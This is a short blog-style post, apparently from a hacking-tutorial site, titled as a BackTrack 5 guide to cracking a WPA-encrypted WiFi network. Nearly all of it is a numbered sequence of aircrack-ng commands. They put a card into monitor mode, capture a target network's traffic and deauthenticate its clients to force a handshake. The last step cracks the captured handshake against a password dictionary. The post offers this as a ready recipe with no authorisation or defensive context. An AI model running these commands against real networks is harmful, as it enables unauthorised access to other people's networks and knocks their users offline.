BackTrack 5 How To a Crack Wireless Network Anonymous 13:59 A+ A- Print Email How to crack a WPA encrypted WiFi Network with Backtrack 5Steps:1)airmon-ng 2)airmon-ng start wlan03)airodump-ng mon04)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon05)aireplay-ng -0 5 -a (bssid) mon06)aircrack-ng (filename)*.cap -w (dictionary location)
Post a Comment